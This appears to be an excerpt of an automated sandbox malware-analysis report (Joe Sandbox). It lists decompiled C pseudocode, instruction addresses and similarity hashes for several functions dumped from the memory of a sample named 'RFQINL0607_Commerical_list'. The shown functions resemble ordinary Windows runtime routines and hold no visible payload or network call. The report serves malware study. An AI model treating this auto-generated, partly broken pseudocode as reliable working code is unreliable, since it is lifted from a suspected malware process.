				char _v57;
				intOrPtr _v60;
				char _v61;
				char _v73;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t47;
				intOrPtr _t51;
				void* _t55;
				char _t60;
				void* _t68;
				void* _t78;
				unsigned int _t81;
				unsigned int _t82;
				void* _t94;
				void* _t95;
				void* _t97;
				unsigned int _t99;
				short _t100;
				signed int _t101;
				void* _t103;

				_t82 = __ecx;
				_t103 = (_t101 & 0xfffffff8) - 0x2c;
				_v44 = _v44 & 0x00000000;
				_push(_t78);
				_push(_t97);
				_push(_t94);
				_push( &_v44);
				_push(0);
				_push(0x33321050);
				E3336F2F0(_t78, _t94, _t97, __eflags);
				_t95 = E3335DE20(_t82, __eflags, _v56, "true", 0xd,  &_v52);
				if(_t95 == 0) {
					_t47 = 0;
					L15:
					return _t47;
				}
				_t99 = 0;
				_t81 = _v52 >> 5;
				_v44 =  *( *[fs:0x30] + 0x38);
				_v40 = 0;
				_v36 = 0;
				_v52 = 0;
				if(_t81 == 0) {
					L14:
					_t47 = _t99;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t51 =  *((intOrPtr*)(_t95 + 4));
					if(_t51 == 0) {
						break;
					}
					_push(4);
					_v48 = _t51 + _v56;
					_t55 = E333974B0(_t51 + _v56, "EXT-");
					_t103 = _t103 + 0xc;
					_t108 = _t55;
					if(_t55 != 0) {
						L11:
						_t95 = _t95 + 0x20;
						_t82 = _v52 + 1;
						_v52 = _t82;
						if(_t82 < _t81) {
							continue;
						}
						break;
					}
					E33395010(_t82,  &_v32, _v48);
					_t100 = L3334ADA0(_t82, _t108,  &_v40);
					if(_t100 > (_v50 & 0x0000ffff)) {
						__eflags = _t100 - 0xfffe;
						if(_t100 >= 0xfffe) {
							_t99 = 0xc0000095;
							break;
						}
						__eflags = _v36;
						if(_v36 != 0) {
							E33363B90( &_v40);
						}
						_t60 = E33365D60(_t100);
						_v40 = _t60;
						__eflags = _t60;
						if(_t60 == 0) {
							_t99 = 0xc000009a;
							break;
						} else {
							_v38 = _t100;
							L6:
							E3336C560( &_v40,  &_v32, 0);
							E3336DF36(0,  &_v52, 0x14d0);
							_t99 = E3337015C(_v60,  &_v56, 0,  &_v73,  &_v40);
							if(_t99 < 0 || _v57 == 0) {
								_t68 = 0x14d3;
							} else {
								_t68 = (0 | _v24 == 0x00000000) + 0x14d1;
							}
							E3336DF36(0,  &_v40, _t68);
							if(_v61 != 0 && E333704C0(0x33321174,  &_v24, ?str?) == 0) {
								_t99 = E3336E4F8(_v56, _t95);
								__eflags = _t99;
								if(_t99 < 0) {
									break;
								}
								_t99 = 0;
							}
							goto L11;
						}
					}
					_v40 = 0;
					goto L6;
				}
				if(_v36 != 0) {
					E33363B90( &_v40);
				}
				goto L14;
			}




































                                                                                                                                                                                  0x3336e547
                                                                                                                                                                                  0x3336e54f
                                                                                                                                                                                  0x3336e552
                                                                                                                                                                                  0x3336e55b
                                                                                                                                                                                  0x3336e55c
                                                                                                                                                                                  0x3336e55d
                                                                                                                                                                                  0x3336e55e
                                                                                                                                                                                  0x3336e55f
                                                                                                                                                                                  0x3336e561
                                                                                                                                                                                  0x3336e566
                                                                                                                                                                                  0x3336e57d
                                                                                                                                                                                  0x3336e581
                                                                                                                                                                                  0x3336e706
                                                                                                                                                                                  0x3336e6b9
                                                                                                                                                                                  0x3336e6bf
                                                                                                                                                                                  0x3336e6bf
                                                                                                                                                                                  0x3336e58d
                                                                                                                                                                                  0x3336e593
                                                                                                                                                                                  0x3336e599
                                                                                                                                                                                  0x3336e59f
                                                                                                                                                                                  0x3336e5a3
                                                                                                                                                                                  0x3336e5a7
                                                                                                                                                                                  0x3336e5ad
                                                                                                                                                                                  0x3336e6b7
                                                                                                                                                                                  0x3336e6b7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e5b3
                                                                                                                                                                                  0x3336e5b3
                                                                                                                                                                                  0x3336e5b3
                                                                                                                                                                                  0x3336e5b8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e5c2
                                                                                                                                                                                  0x3336e5ca
                                                                                                                                                                                  0x3336e5ce
                                                                                                                                                                                  0x3336e5d3
                                                                                                                                                                                  0x3336e5d6
                                                                                                                                                                                  0x3336e5d8
                                                                                                                                                                                  0x3336e692
                                                                                                                                                                                  0x3336e696
                                                                                                                                                                                  0x3336e699
                                                                                                                                                                                  0x3336e69a
                                                                                                                                                                                  0x3336e6a0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e6a0
                                                                                                                                                                                  0x3336e5e7
                                                                                                                                                                                  0x3336e5fb
                                                                                                                                                                                  0x3336e5ff
                                                                                                                                                                                  0x3336e6d5
                                                                                                                                                                                  0x3336e6db
                                                                                                                                                                                  0x3336e711
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e711
                                                                                                                                                                                  0x3336e6dd
                                                                                                                                                                                  0x3336e6e2
                                                                                                                                                                                  0x3336e6e9
                                                                                                                                                                                  0x3336e6e9
                                                                                                                                                                                  0x3336e6ef
                                                                                                                                                                                  0x3336e6f4
                                                                                                                                                                                  0x3336e6f8
                                                                                                                                                                                  0x3336e6fa
                                                                                                                                                                                  0x3336e70a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e6fc
                                                                                                                                                                                  0x3336e6fc
                                                                                                                                                                                  0x3336e60c
                                                                                                                                                                                  0x3336e618
                                                                                                                                                                                  0x3336e628
                                                                                                                                                                                  0x3336e646
                                                                                                                                                                                  0x3336e64a
                                                                                                                                                                                  0x333b986f
                                                                                                                                                                                  0x3336e65b
                                                                                                                                                                                  0x3336e665
                                                                                                                                                                                  0x3336e665
                                                                                                                                                                                  0x3336e671
                                                                                                                                                                                  0x3336e67b
                                                                                                                                                                                  0x3336e6cb
                                                                                                                                                                                  0x3336e6cd
                                                                                                                                                                                  0x3336e6cf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e6d1
                                                                                                                                                                                  0x3336e6d1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e67b
                                                                                                                                                                                  0x3336e6fa
                                                                                                                                                                                  0x3336e607
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e607
                                                                                                                                                                                  0x3336e6ab
                                                                                                                                                                                  0x3336e6b2
                                                                                                                                                                                  0x3336e6b2
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: EXT-
                                                                                                                                                                                  • API String ID: 0-1948896318
                                                                                                                                                                                  • Opcode ID: 916485865882e7e1efd4b80aff53c3233514fa92af6ed3083c12a416f8a68d00
                                                                                                                                                                                  • Instruction ID: f71046564628897c06d8316223d2ece6d17ca22fe97aa164347d594b39066360
                                                                                                                                                                                  • Opcode Fuzzy Hash: 916485865882e7e1efd4b80aff53c3233514fa92af6ed3083c12a416f8a68d00
                                                                                                                                                                                  • Instruction Fuzzy Hash: AF41C07691A3019FE710CE65CAC4B5BB7E8AF88708F448A2DF584E7594EA74C9088792
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333841BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                                  			E333841BB(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = L333658B0(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = L33392CE0();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E33392E40();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E33392A80();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0xfe2e401a
							_t109 = L33365D90(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2002fe2e
								E333988C0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2002fe2e
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E33392A80();
										E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                                                                                                  0x333841cf
                                                                                                                                                                                  0x333841d5
                                                                                                                                                                                  0x333841dc
                                                                                                                                                                                  0x333841e3
                                                                                                                                                                                  0x333841ee
                                                                                                                                                                                  0x333841f0
                                                                                                                                                                                  0x333841f4
                                                                                                                                                                                  0x333841fc
                                                                                                                                                                                  0x33384204
                                                                                                                                                                                  0x33384209
                                                                                                                                                                                  0x33384211
                                                                                                                                                                                  0x33384212
                                                                                                                                                                                  0x3338421b
                                                                                                                                                                                  0x3338421f
                                                                                                                                                                                  0x33384220
                                                                                                                                                                                  0x33384228
                                                                                                                                                                                  0x3338422c
                                                                                                                                                                                  0x33384230
                                                                                                                                                                                  0x33384239
                                                                                                                                                                                  0x33384240
                                                                                                                                                                                  0x33384247
                                                                                                                                                                                  0x3338424e
                                                                                                                                                                                  0x333c2e52
                                                                                                                                                                                  0x333c2e52
                                                                                                                                                                                  0x33384254
                                                                                                                                                                                  0x33384254
                                                                                                                                                                                  0x33384256
                                                                                                                                                                                  0x3338425c
                                                                                                                                                                                  0x33384261
                                                                                                                                                                                  0x33384262
                                                                                                                                                                                  0x3338426b
                                                                                                                                                                                  0x3338426f
                                                                                                                                                                                  0x333c2e49
                                                                                                                                                                                  0x333c2e49
                                                                                                                                                                                  0x333c2e4d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33384275
                                                                                                                                                                                  0x33384275
                                                                                                                                                                                  0x33384289
                                                                                                                                                                                  0x3338428d
                                                                                                                                                                                  0x333c2e44
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33384293
                                                                                                                                                                                  0x33384297
                                                                                                                                                                                  0x3338429e
                                                                                                                                                                                  0x333842a5
                                                                                                                                                                                  0x333842ab
                                                                                                                                                                                  0x333842ae
                                                                                                                                                                                  0x333842b2
                                                                                                                                                                                  0x333842b5
                                                                                                                                                                                  0x333842bc
                                                                                                                                                                                  0x333842c0
                                                                                                                                                                                  0x333842d4
                                                                                                                                                                                  0x333842db
                                                                                                                                                                                  0x333842df
                                                                                                                                                                                  0x333842e2
                                                                                                                                                                                  0x333842e7
                                                                                                                                                                                  0x333842ea
                                                                                                                                                                                  0x333842f0
                                                                                                                                                                                  0x3338430b
                                                                                                                                                                                  0x333c2e59
                                                                                                                                                                                  0x333c2e5d
                                                                                                                                                                                  0x333c2e6e
                                                                                                                                                                                  0x333c2e73
                                                                                                                                                                                  0x33384311
                                                                                                                                                                                  0x33384314
                                                                                                                                                                                  0x33384322
                                                                                                                                                                                  0x33384327
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33384327
                                                                                                                                                                                  0x333842f2
                                                                                                                                                                                  0x333842f2
                                                                                                                                                                                  0x333842f5
                                                                                                                                                                                  0x333842f7
                                                                                                                                                                                  0x333842f7
                                                                                                                                                                                  0x333842f0
                                                                                                                                                                                  0x3338428d
                                                                                                                                                                                  0x3338426f
                                                                                                                                                                                  0x3338424e
                                                                                                                                                                                  0x333842ff

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                  • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                                                  • Instruction ID: 23afd51f1d8064f86121c7c5a4711d8420e20a425c453ebea058defaa914407f
                                                                                                                                                                                  • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                                                  • Instruction Fuzzy Hash: AA515A719057109FD320CF69C881A6BB7E8FF48714F00892AFA95D7AA0E7B4D954CB91
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333CC3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                                  			E333CC3B0(char* _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x3344b370 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E33384E50(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E333CC574(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E33398F40( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E333CC3B0;
						E33398F40( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E333A8940( &_v1072, _t75, _t79, _t80, _t81);
						E333DA5E0(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						L33392C70();
					}
					return E33394B50(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E333CC7DD(_a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E333CC6F2(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E33398F40( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E33392B00();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E333CC5F5(_a4,  &_v352, _t80);
						}
					}
					E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E33392A80();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                                                                                                  0x333cc3c2
                                                                                                                                                                                  0x333cc3ca
                                                                                                                                                                                  0x333cc3cd
                                                                                                                                                                                  0x333cc3d6
                                                                                                                                                                                  0x333cc3d7
                                                                                                                                                                                  0x333cc3ee
                                                                                                                                                                                  0x333cc3ff
                                                                                                                                                                                  0x333cc411
                                                                                                                                                                                  0x333cc415
                                                                                                                                                                                  0x333cc4db
                                                                                                                                                                                  0x333cc4db
                                                                                                                                                                                  0x333cc4dd
                                                                                                                                                                                  0x333cc4e2
                                                                                                                                                                                  0x333cc4e9
                                                                                                                                                                                  0x333cc4f5
                                                                                                                                                                                  0x333cc4fd
                                                                                                                                                                                  0x333cc50d
                                                                                                                                                                                  0x333cc517
                                                                                                                                                                                  0x333cc528
                                                                                                                                                                                  0x333cc536
                                                                                                                                                                                  0x333cc537
                                                                                                                                                                                  0x333cc54c
                                                                                                                                                                                  0x333cc551
                                                                                                                                                                                  0x333cc557
                                                                                                                                                                                  0x333cc559
                                                                                                                                                                                  0x333cc559
                                                                                                                                                                                  0x333cc571
                                                                                                                                                                                  0x333cc571
                                                                                                                                                                                  0x333cc425
                                                                                                                                                                                  0x333cc430
                                                                                                                                                                                  0x333cc434
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333cc43a
                                                                                                                                                                                  0x333cc447
                                                                                                                                                                                  0x333cc452
                                                                                                                                                                                  0x333cc456
                                                                                                                                                                                  0x333cc458
                                                                                                                                                                                  0x333cc465
                                                                                                                                                                                  0x333cc46a
                                                                                                                                                                                  0x333cc473
                                                                                                                                                                                  0x333cc474
                                                                                                                                                                                  0x333cc479
                                                                                                                                                                                  0x333cc47a
                                                                                                                                                                                  0x333cc482
                                                                                                                                                                                  0x333cc483
                                                                                                                                                                                  0x333cc48e
                                                                                                                                                                                  0x333cc492
                                                                                                                                                                                  0x333cc498
                                                                                                                                                                                  0x333cc49f
                                                                                                                                                                                  0x333cc49f
                                                                                                                                                                                  0x333cc4a6
                                                                                                                                                                                  0x333cc4a8
                                                                                                                                                                                  0x333cc4ab
                                                                                                                                                                                  0x333cc4b2
                                                                                                                                                                                  0x333cc4b2
                                                                                                                                                                                  0x333cc4a6
                                                                                                                                                                                  0x333cc4c7
                                                                                                                                                                                  0x333cc4c7
                                                                                                                                                                                  0x333cc4cc
                                                                                                                                                                                  0x333cc4d2
                                                                                                                                                                                  0x333cc4d9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: BinaryHash
                                                                                                                                                                                  • API String ID: 0-2202222882
                                                                                                                                                                                  • Opcode ID: 5f1f8b401a2ff85628e94985c05c73c4606886ce7da1bde2960298b826e730cf
                                                                                                                                                                                  • Instruction ID: 112934913b785c08994373257ce17f6833c0a8bb0beafe1abb72abbf2f40c5e0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f1f8b401a2ff85628e94985c05c73c4606886ce7da1bde2960298b826e730cf
                                                                                                                                                                                  • Instruction Fuzzy Hash: A14142B2D0166CAADB21DE60DC80FDEB77CEB44714F00C5E5E609AB140DB309E898FA4
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333507A7 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                                  			E333507A7(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t43;
				intOrPtr* _t48;
				intOrPtr _t49;
				char* _t54;
				intOrPtr _t57;
				void* _t67;
				void* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t74;
				signed char _t79;
				intOrPtr* _t80;
				intOrPtr* _t82;
				void* _t86;
				intOrPtr _t89;

				_t43 =  *0x3344664c; // 0x2fed540
				_push(0);
				_t86 = __edx;
				_t89 = __ecx;
				L33362330(_t43 + 4, _t43 + 4);
				_t1 = _t89 + 0x28; // 0x28
				L33362330(_t1, _t1);
				_t2 = _t89 + 0x2c; // 0x2c
				_t82 = _t2;
				_t73 =  *((intOrPtr*)(_t82 + 4));
				_t48 = _t86 + 4;
				if( *_t73 != _t82) {
					_t74 = 3;
					asm("int 0x29");
					L24:
					_t49 =  *((intOrPtr*)(_t74 + 0x18));
					L22:
					_t74 =  *_t74;
					L20:
					if(_t74 == _t82) {
						L11:
						 *((intOrPtr*)(_t89 + 0x18)) = _t49;
						_push( &_v12);
						_push(0);
						_t25 = _t89 + 0x10; // 0x10
						_push(_t49);
						_t69 = E33394550();
						if(_t69 >= 0) {
							 *((intOrPtr*)(_t89 + 8)) = _v12;
							 *((intOrPtr*)(_t89 + 0xc)) = _v8;
						}
						if(L33363C40() != 0) {
							_t54 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
						} else {
							_t54 = 0x7ffe038e;
						}
						if( *_t54 != 0) {
							if(_t69 >= 0) {
								E333DC5FC(_t86, _t89,  *((intOrPtr*)(_t89 + 0x50)),  *((intOrPtr*)(_t86 + 0x10)),  *(_t86 + 0x24),  *((intOrPtr*)(_t89 + 0x10)),  *((intOrPtr*)(_t89 + 0x14)));
							}
						}
						_t30 = _t89 + 0x28; // 0x28
						E333624D0(_t30);
						_t57 =  *0x3344664c; // 0x2fed540
						E333624D0(_t57 + 4);
						return _t69;
					}
					if(_t49 >  *((intOrPtr*)(_t74 + 0x18))) {
						goto L24;
					}
					goto L22;
				}
				 *_t48 = _t82;
				 *((intOrPtr*)(_t48 + 4)) = _t73;
				 *_t73 = _t48;
				 *((intOrPtr*)(_t82 + 4)) = _t48;
				 *((intOrPtr*)(_t86 + 0xc)) = _t89;
				if( *((intOrPtr*)(_t89 + 0x5c)) == 1) {
					if(( *(_t86 + 0x24) & 0xffffffee) != 0) {
						 *((intOrPtr*)(_t86 + 0x64)) = 1;
					}
				}
				_t79 = 0;
				_t9 = _t89 + 0x3c; // 0x3c
				_t71 = _t9;
				goto L3;
				do {
					L6:
					if( *_t80 != 0) {
						asm("bts ebx, eax");
					}
					_t67 = _t67 + 1;
					_t80 = _t80 + 4;
				} while (_t67 < 5);
				 *((intOrPtr*)(_t89 + 0x34)) =  *((intOrPtr*)(_t89 + 0x34)) + 1;
				if(( *(_t86 + 0x20) & 0x00000004) != 0) {
					 *((intOrPtr*)(_t89 + 0x38)) =  *((intOrPtr*)(_t89 + 0x38)) + 1;
				}
				_t49 =  *((intOrPtr*)(_t86 + 0x1c));
				if( *((intOrPtr*)(_t89 + 0x18)) < _t49) {
					_t74 =  *_t82;
					goto L20;
				} else {
					goto L11;
				}
				L3:
				if(( *(_t86 + 0x24) & 1 << _t79) != 0) {
					 *_t71 =  *_t71 + 1;
				}
				_t79 = _t79 + 1;
				_t71 = _t71 + 4;
				if(_t79 < 5) {
					goto L3;
				} else {
					_t13 = _t89 + 0x3c; // 0x3c
					_t80 = _t13;
					_t67 = 0;
					goto L6;
				}
			}




















                                                                                                                                                                                  0x333507af
                                                                                                                                                                                  0x333507ba
                                                                                                                                                                                  0x333507be
                                                                                                                                                                                  0x333507c0
                                                                                                                                                                                  0x333507c2
                                                                                                                                                                                  0x333507c7
                                                                                                                                                                                  0x333507cb
                                                                                                                                                                                  0x333507d0
                                                                                                                                                                                  0x333507d0
                                                                                                                                                                                  0x333507d3
                                                                                                                                                                                  0x333507d6
                                                                                                                                                                                  0x333507db
                                                                                                                                                                                  0x333508c5
                                                                                                                                                                                  0x333508c6
                                                                                                                                                                                  0x333508c8
                                                                                                                                                                                  0x333508c8
                                                                                                                                                                                  0x333508bf
                                                                                                                                                                                  0x333508bf
                                                                                                                                                                                  0x333508b6
                                                                                                                                                                                  0x333508b8
                                                                                                                                                                                  0x33350843
                                                                                                                                                                                  0x33350847
                                                                                                                                                                                  0x3335084a
                                                                                                                                                                                  0x3335084b
                                                                                                                                                                                  0x3335084c
                                                                                                                                                                                  0x3335084f
                                                                                                                                                                                  0x33350856
                                                                                                                                                                                  0x3335085a
                                                                                                                                                                                  0x33350860
                                                                                                                                                                                  0x33350867
                                                                                                                                                                                  0x33350867
                                                                                                                                                                                  0x33350871
                                                                                                                                                                                  0x333aea96
                                                                                                                                                                                  0x33350877
                                                                                                                                                                                  0x33350877
                                                                                                                                                                                  0x33350877
                                                                                                                                                                                  0x3335087f
                                                                                                                                                                                  0x333aeaa2
                                                                                                                                                                                  0x333aeabb
                                                                                                                                                                                  0x333aeabb
                                                                                                                                                                                  0x333aeaa2
                                                                                                                                                                                  0x33350885
                                                                                                                                                                                  0x33350889
                                                                                                                                                                                  0x3335088e
                                                                                                                                                                                  0x33350897
                                                                                                                                                                                  0x333508a4
                                                                                                                                                                                  0x333508a4
                                                                                                                                                                                  0x333508bd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333508bd
                                                                                                                                                                                  0x333507e1
                                                                                                                                                                                  0x333507e3
                                                                                                                                                                                  0x333507e6
                                                                                                                                                                                  0x333507e8
                                                                                                                                                                                  0x333507ee
                                                                                                                                                                                  0x333507f4
                                                                                                                                                                                  0x333aea7f
                                                                                                                                                                                  0x333aea85
                                                                                                                                                                                  0x333aea85
                                                                                                                                                                                  0x333aea7f
                                                                                                                                                                                  0x333507fa
                                                                                                                                                                                  0x333507fc
                                                                                                                                                                                  0x333507fc
                                                                                                                                                                                  0x333507fc
                                                                                                                                                                                  0x3335081d
                                                                                                                                                                                  0x3335081d
                                                                                                                                                                                  0x33350820
                                                                                                                                                                                  0x333508ac
                                                                                                                                                                                  0x333508ac
                                                                                                                                                                                  0x33350826
                                                                                                                                                                                  0x33350827
                                                                                                                                                                                  0x3335082a
                                                                                                                                                                                  0x3335082f
                                                                                                                                                                                  0x33350836
                                                                                                                                                                                  0x33350838
                                                                                                                                                                                  0x33350838
                                                                                                                                                                                  0x3335083b
                                                                                                                                                                                  0x33350841
                                                                                                                                                                                  0x333508b4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333507ff
                                                                                                                                                                                  0x33350807
                                                                                                                                                                                  0x333508a5
                                                                                                                                                                                  0x333508a5
                                                                                                                                                                                  0x3335080d
                                                                                                                                                                                  0x3335080e
                                                                                                                                                                                  0x33350814
